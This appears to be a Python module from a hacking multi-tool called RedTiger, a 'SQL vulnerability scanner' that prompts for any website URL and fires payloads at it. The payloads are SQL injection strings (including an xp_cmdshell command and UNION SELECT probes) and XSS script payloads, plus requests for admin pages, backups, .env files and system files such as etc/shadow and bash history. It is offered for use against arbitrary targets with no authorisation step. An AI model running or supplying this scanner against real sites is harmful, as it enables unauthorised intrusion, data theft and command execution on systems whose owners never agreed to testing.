# Copyright (c) RedTiger
# See the file 'LICENSE' for copying permission
# ----------------------------------------------------------------------------------------------------------------------------------------------------------|
# EN: 
#     - Do not touch or modify the code below. If there is an error, please contact the owner, but under no circumstances should you touch the code.
#     - Do not resell this tool, do not credit it to yours.
# FR: 
#     - Ne pas toucher ni modifier le code ci-dessous. En cas d'erreur, veuillez contacter le propriétaire, mais en aucun cas vous ne devez toucher au code.
#     - Ne revendez pas ce tool, ne le créditez pas au vôtre.

from Config.Util import *
from Config.Config import *

try:
    import requests
except Exception as e:
    ErrorModule(e)

Title("Sql Vulnerability Scanner")

try:
    user_agent = ChoiceUserAgent()
    headers = {"User-Agent": user_agent}

    def InterestingPath(url):
        paths = [
            "admin", "admin/", "admin/index.php", "admin/login.php", "admin/config.php",
            "backup", "backup/", "backup/db.sql", "backup/config.tar.gz", "backup/backup.sql",
            "private", "private/", "private/.env", "private/config.php", "private/secret.txt",
            "uploads", "uploads/", "uploads/file.txt", "uploads/image.jpg", "uploads/backup.zip",
            "api", "api/", "api/v1/", "api/v1/users", "api/v1/status",
            "logs", "logs/", "logs/error.log", "logs/access.log", "logs/debug.log",
            "cache", "cache/", "cache/temp/", "cache/session/", "cache/data/",
            "server-status", "server-status/", "server-status/index.html",
            "dashboard", "dashboard/", "dashboard/index.html", "dashboard/admin.php", "dashboard/settings.php"
        ]
        CheckPaths(url, paths, "Interesting Path")

    def SensitiveFile(url):
        files = [
            "etc/passwd", "etc/password", "etc/shadow", "etc/group", "etc/hosts", "etc/hostname",
            "var/log/auth.log", "var/log/syslog", "var/log/messages", "var/log/nginx/access.log",
            "root/.bash_history", "home/user/.bash_history", "www/html/wp-config.php", "proc/self/environ",
            "opt/lampp/phpmyadmin/config.inc.php", "boot/grub/menu.lst", "proc/net/tcp"
        ]
        CheckPaths(url, files, "Sensitive File")

    def Xss(url):
        payloads = [
            "<script>alert('XssFoundByRedTiger')</script>",
            "<img src=x onerror=alert('XssFoundByRedTiger')>",
            "<svg/onload=alert('XssFoundByRedTiger')>"
        ]
        indicators = ["<script>", "alert(", "onerror=", "<svg", "javascript:"]
        TestPayloads(url, payloads, indicators, "Xss")

    def Sql(url):
        payloads = [
            "'", '"', "''", "' OR '1'='1'", "' OR '1'='1' --", "' OR '1'='1' /*", "' OR 1=1 --", "/1000",
            "' OR 1=1 /*", "' OR 'a'='a", "' OR 'a'='a' --", "' OR 'a'='a' /*", "' OR ''='", "admin'--", "admin' /*",
            "' OR 1=1#", "' OR '1'='1' (", "') OR ('1'='1", "'; EXEC xp_cmdshell('dir'); --", "' UNION SELECT NULL, NULL, NULL --", 
            "' OR 1=1 --", "' OR '1'='1' --", "' OR '1'='1' #", "' OR '1'='1'/*", "' OR '1'='1'--", "' OR 1=1#", "' OR 1=1/*", 
            "' OR 'a'='a'#", "' OR 'a'='a'/*", "' OR ''=''", "' OR '1'='1'--", "admin' --", "admin' #", "' OR 1=1--", "' OR 1=1/*", 
            "' OR 'a'='a'--", "' OR ''=''", "' OR 'x'='x'", "' OR 'x'='x'--", "' OR 'x'='x'/*", "' OR 1=1#", "' OR 1=1--", 
            "' OR 1=1/*", "' OR '1'='1'/*", "' OR '1'='1'--", "' OR '1'='1'#", "' OR '1'='1'/*"
        ]
        indicators =  [
            "SQL syntax", "SQL error", "MySQL", "mysql", "MySQLYou",
            "Unclosed quotation mark", "SQLSTATE", "syntax error", "ORA-", 
            "SQLite", "PostgreSQL", "Truncated incorrect", "Division by zero",
            "You have an error in your SQL syntax", "Incorrect syntax near", 
            "SQL command not properly ended", "sql", "Sql", "Warning", "Error"
        ]
        TestPayloads(url, payloads, indicators, "Sql")

    def CheckPaths(url, paths, vulnerability_name):
        try:
            if not str(url).endswith("/"):
                url += "/"
            found = False
            for path in paths:
                response = requests.get(url + path, timeout=10, headers=headers)
                if response.status_code == 200:
                    found = True
                    print(f"{BEFORE_GREEN + current_time_hour() + AFTER_GREEN} {GEN_VALID} Vulnerability: {white + vulnerability_name + green} Status: {white}True{green} Path Found: {white}/{path + green}")
            if not found:
                print(f"{BEFORE + current_time_hour() + AFTER} {ERROR} Vulnerability: {white + vulnerability_name + red} Status: {white}False{red}")
        except:
            print(f"{BEFORE + current_time_hour() + AFTER} {ERROR} Vulnerability: {white + vulnerability_name + red} Status: {white}Error during testing{red}")

    def TestPayloads(url, payloads, indicators, vulnerability_name):
        try:
            response_old = requests.get(url, timeout=10, headers=headers)
            if not str(url).endswith("/"):
                url += "/"
            found = False
            for payload in payloads:
                response = requests.get(url + payload, timeout=10, headers=headers)
                if response.status_code == 200 and response.text.lower() != response_old.text.lower():
                    for indicator in indicators:
                        if indicator.lower() in response.text.lower():
                            found = True
                            print(f"{BEFORE_GREEN + current_time_hour() + AFTER_GREEN} {GEN_VALID} Vulnerability: {white + vulnerability_name + green} Status: {white}True{green} Provocation: {white + payload + green} Indicator: {white + indicator}")
                            break
            if not found:
                print(f"{BEFORE + current_time_hour() + AFTER} {ERROR} Vulnerability: {white + vulnerability_name + red} Status: {white}False{red}")
        except:
            print(f"{BEFORE + current_time_hour() + AFTER} {ERROR} Vulnerability: {white + vulnerability_name + red} Status: {white}Error during testing{red}")

    Slow(sql_banner)
    print(f"{BEFORE + current_time_hour() + AFTER} {INFO} Selected User-Agent: {white + user_agent}")
    website_url = input(f"{BEFORE + current_time_hour() + AFTER} {INPUT} Website Url -> {reset}")
    Censored(website_url)

    print(f"{BEFORE + current_time_hour() + AFTER} {WAIT} Looking for a vulnerability...")
    if "https://" not in website_url and "http://" not in website_url:
        website_url = "https://" + website_url

    Sql(website_url)
    Xss(website_url)
    InterestingPath(website_url)
    SensitiveFile(website_url)
    Continue()
    Reset()

except Exception as e:
    Error(e)

